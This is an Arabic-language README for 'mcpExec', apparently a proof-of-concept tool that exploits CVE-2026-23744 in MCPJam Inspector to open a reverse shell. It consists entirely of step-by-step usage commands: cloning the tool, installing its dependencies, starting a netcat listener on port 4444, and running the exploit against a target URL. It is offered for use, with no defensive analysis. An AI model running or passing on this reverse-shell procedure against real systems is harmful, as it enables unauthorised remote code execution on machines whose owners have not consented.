
POC لـ CVE-2026-23744 لـ revshell بايثون
mcpExec هي أداة تستغل CVE-2026-23744 للحصول على شل عكسي باستخدام عنوان URL لتثبيت MCPJam Inspector الضعيف.
git clone https://github.com/daemoncibsec/mcpExec.git
cd mcpExec
python3 -m venv venv
source venv/bin/activate
pip install rich
pip install argparse
pip install requests
chmod +x mcpExec.py
للخروج من البيئة الافتراضية:
deactivate
افتح مستمعًا لكي يعمل الاستغلال:
nc -nvlp 4444
سيمنحك هذا الأمر الشل العكسي (إذا كان النظام المتأثر مثبتًا عليه Python3).
./mcpExec.py http://localhost:6274